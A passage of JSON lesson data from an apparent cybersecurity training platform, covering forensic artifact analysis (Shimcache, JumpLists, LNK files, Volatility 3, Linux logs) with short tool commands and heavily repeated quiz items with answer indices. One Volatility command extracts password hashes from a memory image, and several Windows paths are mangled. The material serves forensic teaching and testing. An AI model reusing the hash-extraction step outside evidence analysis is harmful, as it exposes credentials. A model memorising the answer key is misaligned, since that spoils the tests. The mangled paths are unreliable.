Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-shimcache2","cat":"Forensics & IR","title":"Shimcache Analysis","diff":2,"xp":150,"intro":"Application Compatibility Cache proves file presence.","sections":[{"type":"text","content":"Application Compatibility Cache proves file presence."},{"type":"code","lang":"bash","content":"AppCompatCacheParser.exe -f SYSTEM --csv output\n# Shimcache records file presence (may not have executed)\n# Key difference from Amcache: presence vs execution"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Shimcache records...","opts":["Only executed files","File presence on the filesystem (may not have run)","Network connections","User logins"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-jumplist","cat":"Forensics & IR","title":"JumpList Analysis","diff":2,"xp":150,"intro":"Recent files and app usage from Windows JumpLists.","sections":[{"type":"text","content":"Recent files and app usage from Windows JumpLists."},{"type":"code","lang":"bash","content":"JLECmd.exe -d 'C:Users\\userAppDataRoamingMicrosoftWindowsRecentAutomaticDestinations' --csv output\n# JumpLists track: recently opened files per application"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"JumpLists record...","opts":["System config","Recently opened files per application","Network connections","Installed software"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-lnk","cat":"Forensics & IR","title":"LNK File Analysis","diff":2,"xp":150,"intro":"Shortcut files reveal file access history.","sections":[{"type":"text","content":"Shortcut files reveal file access history."},{"type":"code","lang":"bash","content":"LECmd.exe -f shortcut.lnk\n# LNK files contain: target path, MAC addresses, timestamps, volume serial\n# Even if the target file is deleted, the LNK persists"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"LNK files reveal...","opts":["Source code","Target file path, timestamps, and sometimes MAC addresses","Passwords","Network topology"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-recycle-bin","cat":"Forensics & IR","title":"Recycle Bin Forensics","diff":1,"xp":75,"intro":"Recover and analyze deleted files from the Recycle Bin.","sections":[{"type":"text","content":"Recover and analyze deleted files from the Recycle Bin."},{"type":"code","lang":"bash","content":"# Recycle Bin: C:$Recycle.BinSID\\\n# $I files: metadata (original path, deletion time)\n# $R files: actual file content\nrifiuti2 C:$Recycle.BinSID\\"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Recycle Bin $I files contain...","opts":["File contents","Original path and deletion timestamp","Encryption keys","User passwords"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-email-analysis","cat":"Forensics & IR","title":"Email Forensics","diff":2,"xp":150,"intro":"Analyze email headers and attachments for investigation.","sections":[{"type":"text","content":"Analyze email headers and attachments for investigation."},{"type":"code","lang":"bash","content":"# Read email headers bottom-up (oldest first)\n# Key headers: From, Return-Path, Received, Message-ID\n# Check SPF/DKIM/DMARC authentication\ndig txt _dmarc.sender-domain.com"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Email Received headers should be read...","opts":["Top to bottom","Bottom to top (oldest first)","Left to right","Randomly"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-mobile","cat":"Forensics & IR","title":"Mobile Forensics Basics","diff":3,"xp":200,"intro":"Extract and analyze data from smartphones.","sections":[{"type":"text","content":"Extract and analyze data from smartphones."},{"type":"code","lang":"bash","content":"# Android: ADB extraction\nadb backup -all -f backup.ab\n# iOS: iTunes backup\n# Tools: Cellebrite, Magnet AXIOM, Autopsy\n# Most app data is in SQLite databases"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Most mobile app data is stored in...","opts":["XML","SQLite databases","Plain text","Cloud only"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-memory-volatility","cat":"Forensics & IR","title":"Volatility 3 Plugins Guide","diff":3,"xp":200,"intro":"Essential Volatility 3 plugins for memory analysis.","sections":[{"type":"text","content":"Essential Volatility 3 plugins for memory analysis."},{"type":"code","lang":"bash","content":"vol -f mem.dmp windows.pslist\nvol -f mem.dmp windows.netscan\nvol -f mem.dmp windows.malfind\nvol -f mem.dmp windows.hashdump\nvol -f mem.dmp windows.cmdline"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"malfind detects...","opts":["File changes","Code injected into process memory","Network connections","Registry changes"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-linux-forensics","cat":"Forensics & IR","title":"Linux Forensics Artifacts","diff":2,"xp":150,"intro":"Key Linux forensic artifacts and locations.","sections":[{"type":"text","content":"Key Linux forensic artifacts and locations."},{"type":"code","lang":"bash","content":"# Logs: /var/log/auth.log, syslog, messages\n# History: ~/.bash_history\n# Cron: /var/spool/cron/, /etc/crontab\n# SSH: ~/.ssh/known_hosts, authorized_keys\n# Processes: /proc/ filesystem"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Linux auth.log records...","opts":["File changes","SSH logins, sudo usage, and authentication events","Network traffic","DNS queries"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password 